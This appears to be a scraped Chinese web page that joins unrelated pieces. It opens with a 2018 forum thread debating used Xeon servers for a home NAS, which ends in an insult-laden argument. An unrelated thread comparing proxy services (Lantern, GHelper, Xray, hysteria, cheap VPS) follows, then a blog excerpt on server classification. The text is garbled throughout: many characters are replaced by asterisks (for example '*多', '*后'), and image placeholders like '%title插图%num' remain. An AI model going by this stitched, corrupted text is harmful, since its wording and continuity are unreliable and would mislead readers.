分类: 服务器

服务器

自组 NAS 服务器 2011 平台有推荐否

之前都是用 1366 的,帮别人配过很多台,C2100 的 R510 的静音性能都还是可以的。

存储都是 9211-8i HBA SAS6G + 12 盘 4T

系统软件 ESXI 6+,FreeNAS,直通 HBA 卡,ZFS RAIDZ2,加 SSD 缓存。

这些洋垃圾的服务器,稳定性还是挺不错的,基本没有什么异常出现

现在自己想升级下自己的 NAS,想考虑下 2011 平台的’洋垃圾’服务器,没怎么研究过,不知道有没有推荐?

zn 2018-06-30 13:38:03 +08:00 via iPhone
家用?还是放机房?

家用的话,用塔式服务器可能还可以,用机架式的话,风扇噪音跟飞机差不多。
ryd994 2
ryd994 2018-06-30 13:40:55 +08:00 via Android
请问 9211-8i 怎么用?配全套 sas 盘么?
接 SATA 的话怎么接呢?只见过 sas>4x SATA 的扩展线
starqoq 3
starqoq 2018-06-30 14:43:35 +08:00
@ryd994 #2
SAS 接口能接 SATA 盘的。SATA 标准是 SAS 标准的一个子集。
ryd994 4
ryd994 2018-06-30 14:59:15 +08:00 via Android
@starqoq 那么一条 sas 线能拖多少 SATA 盘呢?
4 ? 8 ?还是和 sas 盘一样?
starqoq 5
starqoq 2018-06-30 15:07:28 +08:00
@ryd994 #4
你说的是 1 分 4 的线吧。一样的。
liwufan 6
liwufan 2018-06-30 15:32:20 +08:00
@ryd994
1.只有一块 9211-8i 的话,上面有两个 SFF-8087。每个 SFF-8087 可以分成四个 SFF-8482 ( SAS 硬盘)或者 SATA6 6GB/s ( sata 硬盘)。
2.除了阵列卡还有 sas 扩展卡的话,9211-8i *多支持 256 块盘吧,从 sff-8087 接到 sas 扩展卡上的 sff-8087 口可以越变越多。

我想借楼问一个问题,只做备份不做 nas 冗余什么的话,有什么外接硬盘柜吗? usb3.1 的外接硬盘硬盘柜能够看 smart 信息?机箱里硬盘放满了,不想再买台电脑。
xuhaoyangx 7
xuhaoyangx 2018-06-30 15:39:55 +08:00
@zn #1 这是个误区,不是所有的服务器噪音都这么大,C2100 R510 这一类就开机自检时会比较吵,稳定后几乎没什么声音。家用。

我已经配过 20 多台,既有给别人家用的,也有公司测试用的。

@ryd994 #2 背板有 SAS 接口不需要转 SATA。9211-8i 多接几个硬盘柜都没问题。
@liwufan #6 usb3.1 的我踩过坑,消费级别价格的别碰。
zn 8
zn 2018-06-30 15:52:47 +08:00 via iPhone
@xuhaoyangx 负载上去后能继续保持安静?
fuckshiter 9
fuckshiter 2018-06-30 15:53:43 +08:00 via iPhone
你们都放的什么啊,要几十 T 这么大空间的吗
ryd994 10
ryd994 2018-06-30 17:40:05 +08:00 via Android
@liwufan 大部分 USB 硬盘盒性能都很不靠谱
我就没有买到过 4 盘同时跑,总带宽能超过 200MB/s 的

@fuckshiter 比起靠谱的云盘,价格算低的。而且本地可以千兆访问。外网做不到。

likuku 2018-06-30 17:42:30 +08:00 via iPhone
@zn dell R610 时代开始( R410,R510,520 )就如楼主所言只有开机加电自检时很吵,os loading 开始就非常安静。别长时间高负载运行。
likuku 12
likuku 2018-06-30 17:43:25 +08:00 via iPhone
@fuckshiter 假若拍视频的话,几十 TB 很合理
xuhaoyangx 13
xuhaoyangx 2018-06-30 17:47:03 +08:00
@zn #8 nas 需要什么负载?相当长的负载才会高

@fuckshiter #9 视频编辑 4k 一年随随便便 20t
zn 14
zn 2018-06-30 18:29:58 +08:00
@xuhaoyangx 既然不需要什么负载,那就说明并不需要很高的性能,那何必花那么大钱买服务器?
zn 15
zn 2018-06-30 18:31:28 +08:00
@xuhaoyangx 买个大一点的机箱,买块接口多的主板自己组一个 NAS 足够了。
likuku 16
likuku 2018-06-30 18:41:37 +08:00 via iPhone
@zn 服务器有正面热插拔硬盘架,这个太方便,电源质量更好,散热设计良好
xuhaoyangx 17
xuhaoyangx 2018-06-30 18:45:22 +08:00
@zn #14 请搞清楚服务器和消费级的区别再发表,你这么说真的好搞笑

稳定性,服务器的很多特性。esxi 家用支持有支持的吗,传感器完善的吗。远程控制有吗。电源更好吗。支持 12 盘甚至更多的消费级主板?

虽说洋垃圾,IDC 淘汰的机子,稳定性是消费级不可比
xuhaoyangx 18
xuhaoyangx 2018-06-30 18:46:13 +08:00
@zn #15 对了请找个消费级的 12 个 3.5 硬盘位 的机箱
vtoexshan 19
vtoexshan 2018-06-30 18:48:47 +08:00 via Android
上玩客云试试
liwufan 20
liwufan 2018-06-30 18:48:57 +08:00
@ryd994
@xuhaoyangx
好吧,那么洋垃圾 DAS,8 盘位机柜有推荐的吗?
ryd994 21
ryd994 2018-06-30 19:14:50 +08:00
@liwufan 找个设计好点的 ATX 机箱都行
3 光驱位转 5 硬盘位了解一下
但是,强烈推荐从二手工作站起步。至少有 ECC 内存,加内存都是白菜价。总体升级空间也高。

@xuhaoyangx 目前在用 Z420,就是安静而已。自带 10SATA 口,但 3 硬盘位 3 光驱位塞满了也就是 8 盘位。我自己是够用了。
看你这个情况反正也是要再加 HBA 拖出来的。

@vtoexshan 别逗,也不算算储存什么价钱。开个一年不到就够这里全套买齐了。何况带宽就那点。本地千兆至少,有钱上万兆也不在话下。
xuhaoyangx 22
xuhaoyangx 2018-06-30 19:20:30 +08:00
@ryd994 #21 用背板轻松支持 24 盘 以前老的有 24 盘的机器,一样是通过 9211 解决的
Fatenana 23
Fatenana 2018-06-30 19:37:11 +08:00
双 cpu 的 e5 有没有平时实测能控制在 60w 以下的? 或者说支持 reg ecc 的板子。

其实是看中洋垃圾 reg ecc 便宜,ecc 太贵了。但家里玩太电老虎也不大好。
liwufan 24
liwufan 2018-06-30 19:42:28 +08:00
@ryd994 我是松鼠党,10TB 硬盘塞满了再买一块。中塔机箱已经有两个了太多了,再买浪费电。光驱硬盘笼买过,硬盘太烫,通风和震动都不达标。电脑也没想着升级,pcie4.0 都要出了,洋垃圾一堆 pcie2.0x8 的没升级欲望……所以想要的只是–外接硬盘备份。。什么 NAS,SAN (虚拟机 zfs )我都统统用不着。内网网速只有千兆,再买一台文件传输速度还不如外接 USB ……

问题是雷劈 2 雷劈 3 的菊花链硬盘笼太贵了,SFF-8088 接口好像也可以菊花链,但是找不到关键词
zn 25
zn 2018-06-30 20:55:16 +08:00
@likuku 正面硬盘插拔确实方便。
zn 26
zn 2018-06-30 20:59:23 +08:00
@xuhaoyangx 谁告诉你自己组装就不能买服务器主板? 我家里两台 E3C232D2I ITX 主板组的 NAS 了解一下?
amai 27
amai 2018-06-30 21:48:12 +08:00
2011 目的是什么?
更新的外围 1356 了解下
xenme 28
xenme 2018-06-30 21:55:40 +08:00 via iPhone
@zn 还是建议买群晖或者 qnap,省心,加上扩展支持也能上一二十块盘。
洋垃圾只做存储的话,性能还是有点过剩,而且耗电不少,噪音也不小,不过自己装比买省点而已
ak47iej 29
ak47iej 2018-06-30 22:10:47 +08:00
R720XD,3.5 寸原生 12 盘位,买个准系统,把内存硬盘和卡都搬过去,再看需要买 CPU,估计要四千左右吧…
xuhaoyangx 30
xuhaoyangx 2018-06-30 22:11:21 +08:00
@xenme #28 不知道哪来的噪音-。-。1366 的都已经没什么噪音。

@zn #26 都玩过,*后发现刀片服务器更好
xuhaoyangx 31
xuhaoyangx 2018-06-30 22:11:43 +08:00
@ak47iej #29 老铁….
ak47iej 32
ak47iej 2018-06-30 22:42:33 +08:00
@xuhaoyangx #31 嘿嘿,我就没什么地方买一台来玩了,大佬你买来玩下应该挺适合你的 23333
zn 33
zn 2018-06-30 22:55:29 +08:00
@xuhaoyangx 各有所好吧,我还是喜欢小巧的机箱。
zwpaper 34
zwpaper 2018-07-01 00:16:32 +08:00 via iPhone
大佬,入门级的家用 NAS 有推荐吗?四盘位就可以,主要当网盘和 git 服务端
msg7086 35
msg7086 2018-07-01 02:53:02 +08:00
@zn
> 买个大一点的机箱,买块接口多的主板自己组一个 NAS 足够了。

你 E3C236D2I 配上机箱电源和人家服务器准系统差不多价钱,你这个插单路 E3v6 和两条 DDR4 UECC,人家插的双路 E5v2 和 24 条 DDR3 REGECC *高支持 768G 普条。还不说人家是双路冗余热插拔 920W 铂金级电源,热插拔 SAS 背板……规格和价格都不在一个位面上的。
链接看下面。

@xuhaoyangx
蓝猫家的 6027R 系列,刷 BIOS 配上 E5v2,美滋滋。
https://www.ebay.com/itm/202219189769

@ryd994
HBA 直接分线出来接硬盘,或者点对点直接接背板都行。卡一般能承受 255 个设备,用 SAS Expander 路由器可以扇出 4 个或者 5 个 4 口,接 16 或者 20 个设备。我的 C2100 就是背板自带 Expander,扇入 2×4,扇出 12 硬盘。

@Fatenana
没有吧。E5v2 的双路也要 100w 空载了。再上去 v3v4 的差价比电费差价高很多了。
我 HP 的小刀片,单路 E5v1 空载 50w 上下。你要是不追求*致性能就只插一路呗。
ryd994 36
ryd994 2018-07-01 03:11:57 +08:00 via Android
迫生,溜了溜了
已经败了一千美元,再败下去感觉无底洞啊

@zwpaper 你在这里问的结果等于在卡吧问装机

@msg7086 谢谢指导
xuhaoyangx 37
xuhaoyangx 2018-07-01 10:32:25 +08:00
@msg7086 #35 可以可以
xuhaoyangx 38
xuhaoyangx 2018-07-01 10:40:06 +08:00
@msg7086 #35 1500 你说的那个准系统 带背板 这价位如何。
silencefent 39
silencefent 2018-07-01 10:45:24 +08:00
你们是开电站的吗?电费不要钱啊
zn 40
zn 2018-07-01 12:17:56 +08:00
@msg7086

比完性能,再比一下功耗呗?

楼主自己都说了,一个 NAS 哪来那么多负载,所以那里会需要那么高性能?

如果真的需要高性能,风扇转速一上来,那噪音就跟飞机差不多了。
xuhaoyangx 41
xuhaoyangx 2018-07-01 12:43:55 +08:00
@zn #40 长负载,的确会大声,也只是大声点。用过再说,x265 压制 1 一周=满载一周,C2100 挨着 55-57db,半米 52db,差不多常规机箱两三个 2200 转风扇噪音。
zn 42
zn 2018-07-01 13:20:40 +08:00
@xuhaoyangx 你家里有专门地方放那无所谓的,像我只能放房间里的,只能选择低功耗方案了,不然晚上真的很吵。
xuhaoyangx 43
xuhaoyangx 2018-07-01 13:25:46 +08:00
@zn #42 =。=出租屋我放床底,家里我放客厅。我不知道哪儿吵了
xuhaoyangx 44
xuhaoyangx 2018-07-01 13:26:01 +08:00
@xuhaoyangx #43 兄弟,你用过再说吧。
msg7086 45
msg7086 2018-07-01 14:08:07 +08:00 ❤️ 1
@xuhaoyangx 你自己决定吧,ebay 那个价格的上下区间我觉得都能接受。
Disclaimer: 我没用过 6027 系列。
手里有 6026TT,用起来还是很舒服的。
其实我个人更喜欢 6027TR ……

@zn 功耗你要比那就比呗,E3v6 是 30w idle,E5v2 是 45w idle,双路是 90w。
你要是想省电就只插一半,单颗 E5v2 配上 8Gx3 条子,差不多就是 45w-50w。
硬盘我们算 15w 一颗,12 颗就是 180w,那么*终就是 210w vs 230w 了。
30w 来自 STH 论坛帖子实测,45w 是根据我 E5v1 的 HP 单路服务器 48w 实测值的预估。

兄弟,你觉得这 20w 差距不能接受么……

至于需要高性能的时候,风扇转速上来 TOGA,这个也是想当然了。
比如我们的 HP S6500 小刀片柜,100%风扇的时候差不多就是 TOGA,隔着机房一层玻璃在楼层的另一端都能听到。
不过我会告诉你就算我压片满载整个 4U 刀片柜的时候风扇也才不到 50%转速么。

当然你单台机器要满载,风扇是会响一点的,但是:
1. 到不了 TOGA 的程度,*多些微吵一些。
睡觉不要想了,但是日常生活没问题。吵起来声音相当于抽油烟机的噪音量吧。
风扇是跟着热量走的,室温正常,散热好的话风扇是不会起飞的。
温控,不是 CPU 占用率控。
当然你房间要是和桑拿一样的话是要起飞的。
比如很多 HP 服务器是设计成要在 40-55 度的室温也要能运行,这种时候才会 TOGA。

2. 如果你配的是 E3v6,那性能就算满载也比 E5 少 15%-20%,你想让他跑快都跑不起来。
NAS 通常只会用来做短时间的密集型工作。比如我的 NAS 偶尔会拿来编译软件,或者校验文件等等。

这机器不仅买的是服务器级的做工和配件(比如冗余电源这种一般买不到的东西),还有将来的扩展性。1366 平台*大的问题是功耗(几乎是 2011 的翻倍)而不是性能或者扩展性。不考虑电费的话 C2100 能再用五年不用换。但是 E5v2 与 E5v4 甚至 Scalable 的耗电量几乎一样,就让他成为现在性价比*高的平台了。我上面贴的那个平台,内存能堆到 768G,就算考虑价格边际效应,也能堆上 192G 或 384G 内存,而 E5v6 的内存配置过几年需求上升以后就肯定淘汰了。
这才是选 E5v2 2011 平台的主要原因。

PS: AMD 新的集成板平台也值得一看,3000 和 1000 系列,低功耗,原生支持 10Gbe,至少 10 个 SATA 口,*多 16 核,NAS 神器。
zn 46
zn 2018-07-01 16:06:02 +08:00
@msg7086 emmmmm, 查数据很认真,先给你点个赞。不过这里讨论的是家用啊,谁家用会需要 4U 服务器满载?也许你们这些大神会用到吧,也许。

我的 NAS 用的是 E3-1260L v5,TDP 45W,idle 下功率我没测量过,不过应该在 20W 以下吧。性能么,PassMark 10136,比不上满载功率一两百瓦的 E5,但是能跑满两条千兆网线的同时,顺便还能跑几台虚拟机。家用*对绰绰有余,我都觉得是不是有点 overkill 了。

硬盘功耗方面,希捷是休眠状态大约 0.25W~1W 不等,工作 8~10W 不等(都是普通家用硬盘,15000 转的 SAS 硬盘不考虑)。
lolizeppelin 47
lolizeppelin 2018-07-01 16:39:10 +08:00 via Android
@msg7086
用什么系统 支持硬盘休眠不
xuhaoyangx 48
xuhaoyangx 2018-07-01 16:48:48 +08:00
@zn #46 你好杠啊… 你的那种玩法,我玩过。

我们只说,在我们多硬盘,稳定需求下,电费差距不大,1366 2011 这些线程的服务器准系统,是更适合我们的。

以前还只会 WIN7 的时候,某海电源,自己短路烧了 3 个硬盘,丢了 3t,那个时候不只是纯 nas 用,也会日常操作会在上面。后和你一样,换服务器主板,服务器 U,ECC 内存,换消费级机箱追啥来的 T1 ? 8 盘 用到了 3 个光驱位,你猜怎么着,数据没丢多少,故障盘次数略多,坏了第四个盘才排查出问题,间距太小,太热,风扇 2200 *大转速,也吹不动。

朋友的某海机箱,接地还是机箱与主板 /电源之间的屏蔽没做好,老丢数据,还好当时是换新机测试,*后咋解决,给没一个可以开合的贴上隔热胶布,*缘….那个机箱我记得当时 1000 多吧

说这么多,其实只想告诉你,楼上的玩法我都玩过,指不定哪天你们就遇到问题。

说着别人查数据,别用这你查的数据来算功耗,一切按照功耗计测的为准,老 1366 ilde 单 U 调低电压 8 盘 24g 无显卡 70w 左右。单位有个 e3 v5 的机器,只有 SSD+8G 功耗计 idle 25w,一年 300-400 块电费差距,全年开。

我开的贴,按照我的家用,也就普遍程序员做法吧

X264/X265 压个片,E3 根本不够用,做虚拟化还拖累
不压片,程序员编译放在上面总得来一个吧,自动化 CI 也得来一个吧。
写写 Android,搞搞系统,编译个 AndroidROM。
做个 GIT Server ?跑个自用 API Server ?
妹崽看片,老人看国产剧,孩子看动画片,家里妹妹剪片子,这是我家晚上的活动,双千兆聚合不够用,单磁盘读的速度也不够。

现在都 500M 下载 60M 上行,有公网 IP,非标准端口来个 Server 撒。

正是因为一点一点不够用就一点点升级上来。你怎么定义是家用呢?但当你把家里人的习惯培养出来后,那种配置够?笑
msg7086 49
msg7086 2018-07-01 17:26:46 +08:00
@zn 你看,你要说普通家用的话,那普通家用连 NAS 都用不到。
普通人要看片是打开电视机 /IPTV 看的,平时打打牌聊聊天,谁会用到 NAS。

E3-Lv5 idle 我没查到有人测过功耗,但是你说 20w 以内我就不信了。E3 平台功耗能做到这么低吗?
上面说的 idle 25w 我觉得差不多。
E3 平台做 NAS 是可以的,但是*对没有好到像你 14 15 楼说的那样值得从一个更强劲的平台降下去的程度。
1366 平台其实我们也还在用的,我司的 NAS 就是 C2100,可以参考我之前发在贵站的帖子。
我们手里一堆双路 x5650,说真的,性能打你这块 E3 是问题不大,内存能插 192G,配件坏了去买二手的都是白菜价,唯一缺点就是耗电高,双路 200W。
楼主这就是原地升级把功耗降下来,你让他换家用箱和组装板,那不是机箱电源背板统统降成翔了。
你用不到,觉得 overkill,不代表别人家庭也 overkill 了呀。

而且我猜你的平台估计还会更贵一些……

说句实话,我还真想把那台 4U 刀片机拿回来自己用。800 刀的准系统,自己买点便宜的 E5 和 reg ecc 内存插进去,1500 刀怎么都能整备齐了吧,性能打 1500 刀的工作站那简直就像切菜。还炒鸡省电。卖家给了我两套电源,一套 460wx4,一套 650wx4,结果我 8 个节点插了单路 E5 全满载压片以后才吃 800w,连 460×4 都吃不满。→_→
msg7086 50
msg7086 2018-07-01 17:28:03 +08:00
@lolizeppelin 我们 NAS 用的 ZoL,休眠我们这应该是不支持的,因为跑着 RAID。单盘可能可以,但是没试过。
zn 51
zn 2018-07-01 18:14:57 +08:00
@msg7086

大哥,家用,指的“家里日常使用”,不是指“适合普通家庭使用”,请注意区别,NAS 也就我们这些爱折腾的人用得上,*大部分 — 我猜 99.9% 以上 — 的家庭,是不会买个 NAS 回家用的。这是其一。

第二,E3-1260L v5,注意后面那个 L 后缀,TDP 才 45W,idle 状态耗电 20W 应该没问题吧。

第三, [我司的 NAS] ,那是你司,日常工作经常十几二十个甚至更多人同时连接都很常见,为了保证工作效率,性能越高越好,其定位和“家用”,是差很远的。

第四,PassMark 上 E3-1260L v5 的得分是 10136,功耗 45W ; x5650 的得分是 7431,功耗 95W。[对比链接]( https://www.cpubenchmark.net/compare/Intel-Xeon-X5650-vs-Intel-Xeon-E3-1260L-v5/1304vs2804)。

第五,我的平台确实可能会贵一些,全新配件 vs 洋垃圾,成本是完全不一样的。

*后, [你用不到,觉得 overkill,不代表别人家庭也 overkill 了] ,这句话我是认同的,每个人的需求不一样,所以做法不一样很正常,我回了那么多贴,并不是存心挑起争论,也不是为了抬杠,我的回帖只是想表达一下我的看法,就当做是提建议。如果上面我有哪句话是过激了的,我在这里向你们道歉。
xuhaoyangx 52
xuhaoyangx 2018-07-01 18:19:56 +08:00
@zn #51 请功耗计测试,公司的就是 45w,刚问过
xuhaoyangx 53
xuhaoyangx 2018-07-01 18:27:14 +08:00
@zn #51 他这里指的是双路
zn 54
zn 2018-07-01 20:29:19 +08:00
@xuhaoyangx 然而我真的想不出家用会需要用到双路。。。。压制基本都是一次性的吧,压完就 over 了,又不是天天要压。当然了,这是我的情况,你们大神说不定热爱分享,天天压制出来分享给大家,如果这样的话,那自然需要高性能。
qiuai 55
qiuai 2018-07-01 20:37:25 +08:00 ❤️ 1
我现在的方案分享给你.

型号 ProLiant ML350e Gen8 v2
CPU Intel(R) Xeon(R) CPU E5-2450 v2 @ 2.50GHz 2 颗
内存 48 GB
硬盘 250G 固态*2 + 4T*2

HP 的塔机有个好处就是静音..开机的时候风扇确实声音大,但是持续不到 30 秒.就过去了.

功耗(ILO 自带功率表数据)
5 分钟 20 分钟 24 小时
平均功率 58 瓦 58 瓦 55 瓦
*大功率 82 瓦 82 瓦 114 瓦
*小功率 58 瓦 52 瓦 52 瓦

环境:
esxi 6.5,附带 vcenter,来管理带宽什么的(非必须,估计*大多数人用不到)
win10 x2 挂机,远程工作
win7 x2 工作机
centos x2 因为家里有独立 IP,所以搭了自用网站和测试服务器
群晖 x1 黑裙处理照片是很方便的.
xuhaoyangx 56
xuhaoyangx 2018-07-01 20:37:25 +08:00
@zn #54 =。=没有啊,我举例,比如 Android ROM 编译,和你差不多的 四核 3-4 小时(也许 2 小时多点) 完全编译。双路 X56X0 我能肯定的时基本半小时多点搞定,一个晚上推几个 version,Emmm…

压制喜欢的节目就压制啊,有些不是为了压,比如视频素材,有的为了节省空间….

然后持续化集成啊….

做外部 Server…..60M 的上线,现在已经能占 20%的负载了….虽然我的 NAS 是单路
zn 57
zn 2018-07-01 20:45:40 +08:00
@xuhaoyangx 然而编译安卓 ROM 基本上是一个一次性的活,修修改改后重新编译只需要编译有改动的文件(当然 linking 肯定每次都要的)。so。。。
xuhaoyangx 58
xuhaoyangx 2018-07-01 20:48:43 +08:00
@zn #57 多个机子….
ferock 59
ferock 2018-07-01 20:57:45 +08:00
服务器?太吵了。。。连群晖我都觉得吵。。。毕竟家用
zn 60
zn 2018-07-01 21:03:59 +08:00
@xuhaoyangx 你需求太奇葩。。。。。。
zn 61
zn 2018-07-01 21:04:25 +08:00
@xuhaoyangx 或者说,需求太高端。。。。。已经超出家用的范畴了。
msg7086 62
msg7086 2018-07-02 03:39:45 +08:00
@zn #51 我还是那句话,你的问题就是老把自己家的家用当做全世界的家用。
爱折腾?什么叫爱折腾?
买个群晖算爱折腾吗?
买个 MSG8 算折腾吗?
买个 C2100 算折腾吗?
自己画设计图拿铝材用车床车出 NAS 算折腾吗?

然后就越说越离谱了。TDP 能推断出 idle 功耗? TDP 是 CPU 的散热器指标,你贴 45W 的散热器上去就是逼着 CPU 降频,又不是 CPU 自己突然觉醒了,同样的制造工艺同样的架构设计还能凭空省电?多写几个 L 上去还能成永动机了啊。

第三,我司的情况你怎么那么清楚?我司就两个开发。上双路至强,又便宜又快,生产力工具凭什么要选更贵还更差的产品啊?

第四,你忘了 X5650 能双路了吧。

你不要搞错了。双路和单路,不是说我一定要去用双路,而是双路可以提供很好的扩展性。
你 E3 买来,将来要更强的算力,更大的内存,更多的硬盘,怎么办?二手出掉买新的。
运气不好,遇上牙膏厂挤不出牙膏,你想买新的都买不到。
(你看看,E5-1600 线已经没了,W 线价格上天,E3 线变成 Xeon E,以后卖多少钱还没个数呢)
而我们,再买一块 E5 插上啊,再买点内存插上啊,再买个 HBA 插上啊,又能多战 5 年。

现在 4TB 硬盘早就普及了,4TBx12 阵列做 RAID Z2 Z3 是很正常的做法,ZFS 你给多少内存? 32G UECC 不过分吧。再给点开虚拟机的余量,好了你算算多少钱。按照你那个不那么企业级的配置,楼主早就破产了。

PS: 当你用过刀片集群压片以后,就再也不想用单机压了……
当你用过读写随便超过 600MB/s 的 HDD RAID 阵列以后,就再也不想回去用又危险又慢的所谓家用 NAS 了……
当你用过 10Gbe 以后,就再也不想回去用龟速的千兆网络了……
zn 63
zn 2018-07-02 10:19:40 +08:00 via iPhone
@msg7086 说话这么冲。

我看你才是把自己家用当成全世界家用吧?以你的要求看来,全世界买群辉、威联通的都是傻逼咯?毕竟这么点性能塞牙缝都不够。我的配置发到 nas 交流论坛上,回复的人大都觉得我土豪,就你们几个觉得烂,看来你更能代表家用典型咯?

又来“我司”,商用环境要求能跟家用一样?有几个人那为什么家用机都用 i3i5i7,直接上 E7、上 1T 内存、上 infinitiband、上集群多好啊?

你要求那么高,要啥 x5630 啊,四路 e
7,1024T 内存 起步啊,嫌贵可以先上一颗,先把主板买好,万一以后要扩展呢!
zn 64
zn 2018-07-02 10:28:42 +08:00 via iPhone
@msg7086 另外,你这种需求不叫 nas,叫带 nas 功能的工作站。
msg7086 65
msg7086 2018-07-02 10:47:24 +08:00
@zn 自己翻上去看看标题,人家要推荐 2011 平台的东西,你跳进来帖子一顿喷,你好棒棒哦。
楼主的帖子楼主的家,管别人买群晖买 qnap 的人屁事?你拿你们家别人家的需求去强行套,什么毛病啊?
截了别人的帖子喷了别人的想法,还说别人说话这么冲?
你哪只眼睛看到我说我和 @xuhaoyangx 家的家用平台是全世界的家用平台?
哪只眼睛看到我们说我们代表家用典型?
没长眼睛,还是没长脑子?

还 4 路 E7 呢,我双路 E5 比你 E3 还便宜,嫌贵?你那平台我才嫌贵呢。我们挑便宜的服务器你跟我杠 E7,这下我看出来了,你应该是没脑子。

当然不管你没长啥,这么喜欢杠的我希望你离开 v2 论坛。隔壁有很多杠坛,什么贴吧啊之类的,你可以去那些地方截别人的帖子把你的价值观强行喷到别人脸上。当然不走也没关系,想必你这种能一个帖子从头杠到尾的也不会产生多少有价值的内容,还是 Block 为上策。你请自便。

哦对了,E7 还真不咋地,之前用过一台 40 核 3TB 内存的 E7,真不咋地,跑起来和我们的刀片集群差远了。
下次你要跟人杠,得用 Scalable 杠,逼格才高。
zn 66
zn 2018-07-02 11:19:16 +08:00
@msg7086 噢哟,楼主的帖子楼主的家,惹不起惹不起,还好保住了性命。

[你的问题就是老把自己家的家用当做全世界的家用] 这句话是谁说的? [家用] 两个字是你定义的,还是有一个约定成俗的标准?到你这里 [家用] 就成了 [我和 @xuhaoyangx 家的家用平台] ,这概念转换得,怎么说呢,很有脑子。

希望我离开 V2 论坛,啧啧啧。。。。。还真把这里当成自己家了。

对对对,E7 不咋地的,拿一台 E7 跟一个集群比,还不知道这个集群是什么配置,就直接拿来比,得出 E7 不咋地的结论,脑子大大的有。
xmi 67
xmi 2019-11-30 13:26:50 +08:00
@msg7086 我看了下淘宝 3000 系列的价格,一般家用是不太划算了

msg7086 68
msg7086 2019-11-30 15:38:15 +08:00
@xmi 现在的话还有 X470D4U2-2T 可选,不过价格应该也是在同一个水平上的。
这些的确不适合小规模使用,但是如果是存储量比较大的,或者 SOHO 的话还是很合适的。
企业级硬件,支持 ECC,IPMI 远程管理,如果只考虑买全新品的话还是不错的。

蓝灯、ghelper 哪个好用呢

撸的 azure 天天得换 ip,流量也不够用。
良心云和套路云的轻量经常坚持不了两天。
现在就用 GHelper,晚上速度很差,youtube 看 720p 能费死劲。
不知道蓝灯怎么样有人用过嘛?
还有啥好的推荐么?

nigulasida 1
nigulasida 2 天前
整个机场,一个月 10 块钱,1080P 都无压力
自己搭建,闲的蛋疼
echo314 2
echo314 2 天前 ❤️ 1
https://github.com/XTLS/Xray-core/releases
EasonC 3
EasonC 2 天前 via iPhone
谷歌有 300?试用,速度无压力,不过只能票 3 个月,过期可以继续注册 /购买谷歌号来再续期 3 个月(再试用),因此就是重复循环票
hunk 4
hunk 2 天前
@nigulasida 目前在用机场,不稳定。求推荐选择靠谱机场的方法,现在的 7 月到期。
zuosiruan 5
zuosiruan 2 天前
自己搭吧,简单到不行。只要一台线路稍微好点 vps 就行。vps 可以看看这里
https://www.pai.ma/
wasdqzxe 6
wasdqzxe 1 天前 via Android
有个机场叫大机场 卧槽那是真他妈良心
maocat 7
maocat 1 天前 ❤️ 1
蓝灯,ghelper 都用过

蓝灯:快的时候飞快,慢的时候亲妈都不认识,经常抽风(抽风严重过一段时间白送了一个月),系统代理很好用,跨平台,价格贵,
ghelper:划水的很舒服,网速较快,很少抽风,但是通过订阅链接解析的系统代理,不好用,网速慢,价格适中

个人评价,就这两个来说,蓝灯适合工作,ghelper 适合划水,看视频
love 8
love 1 天前 ❤️ 2
你需要一个不用操作系统自带网络栈的加了黑科技的工具,比如 https://github.com/tobyxdd/hysteria
或者 kcp 也可以,不过 kcp 几乎是双倍发包太浪费流量,且上限很低似乎到 30mbps 就很难上去,且可能要套 udp2raw 否则会被服务商 qos 。
用了这些黑科技,丢包 50%都能看 1080P 。
用原版 OS 的网络丢包 15%就要跪成 ppt,什么 bbr 都救不了。

PS. 程序员用什么机场啊,有这些工具加 cloudcone 这类一年$15 的便宜 vps,一个月几 T 流量,自己用不了还可以给亲朋好友用不好吗,速度也白天晚上流畅 1080P 。
另外这二年几乎不会封 IP 了,至少我是没被封过。
love 9
love 1 天前
对了,cloudcone 不要直接买,注册个帐号,几乎每月都会给你发便宜套餐,一般 15$-20$年。
除了 cloudcone 还有别的一大堆便宜 vps,完全不需要挑网络什么 cn2 gia 什么统统不要,只求便宜,因为有这些黑科技什么垃圾网络都能救。
ooee2016 10
ooee2016 1 天前
@love #8 刚找了个 19.9/y 的机场,买了一年

ooee2016 1 天前
@love #8 主要是昨天下午买的腾讯轻量香港,晚上就不能用了,怕了~~
happyeveryday 12
happyeveryday 1 天前
@ooee2016 你的用法不对吧
1.现在*稳的就是 2L 发的 xray+xtls 方式,性能已经很不错了
2.*稳的话,你在良心云香港轻量上只做 ZF 到其他附近节点,30mbps 的瞬时速度和 1T 流量应付日常使用绰绰有余了
ooee2016 13
ooee2016 1 天前
@happyeveryday #12 我也觉得有可能是我使用的问题。我下午买的。
用<Shadowsocks Python 版一键安装脚本>装好后。回去 ipad 上连上试了下,可以使用,然后我开 B 站看了半小时就再也连不了了。
gxm123gxm 14
gxm123gxm 1 天前
@ooee2016 这么便宜的吗?可以推荐推荐吗
happyeveryday 15
happyeveryday 1 天前
@ooee2016 用 2L 的方式,不要再用任何 ssr 了

服务器的分类

服务器这块的知识是我的知识体系的一个薄弱点,花点时间对三类服务器(PC服务器,小型机,大型机)作一下梳理。

服务器分类的标准有很多,比如按照处理器架构来分可以分为x86服务器、RISC构架服务器和IA-64服务器;按照处理器个数来分可以分为单路、双路和多路服务器;按照服务器的外形结构来分可以分为塔式服务器、机架式服务器和刀片服务器;按照应用级别来分类,可以分为工作组级、部门级和企业级服务器。

按处理器架构分类
下图为IBM服务器体系的划分,这虽然代表了IBM对自身产品线的定位,但也体现了三类服务器的市场定位。

2014年1月23日 消息,联想宣布,以23亿美元收购IBM低端服务器业务,包括20.7亿美元现金,以及1.82亿股联想集团股份。
所以现在IBM的PC服务器已经是联想的了。

联想集团董事长兼CEO杨元庆表示,并购将为联想每年带来50亿美元的营收,联想服务器业务的市场份额将由全球第六上升到第三。 这是继联想2004年收购IBM个人电脑业务后,双方再次发生并购交易。

PC服务器(或叫x86服务器)
基于Intel处理器的x86架构,通用开发的处理器架构。x86系统*早起源于8086芯片组,而芯片组的主处理器是由Intel和AMD所制造。随后,越来越多的厂商将该芯片应用到台式机,笔记本以及服务器上。如今的企业服务器市场上,少数几家厂商占据了*大多数的市场份额。目前,市场上主流的x86服务器包括:

1.IBM x系列服务器

2.HP Proliant DL/ML以及BL服务器

3.NEC Express服务器

4.Dell PowerEdge

5.Sun(Oracle) Sun Fire和Netra

X86服务器的操作系统可以有很多选择,可以是Enterprise Linux,也可以是Windows Server系列。就像前面说的那样,Sun还把原本只应用于小型机的Solaris移植到了X86平台。

x86服务器各家厂商的市场份额

综观2012年全年X86市场,虽然从整体份额上看,IBM 、DELL、HP仍占有X86市场过半江山。

%title插图%num

IBM X系列x86服务器型号的简介

%title插图%num

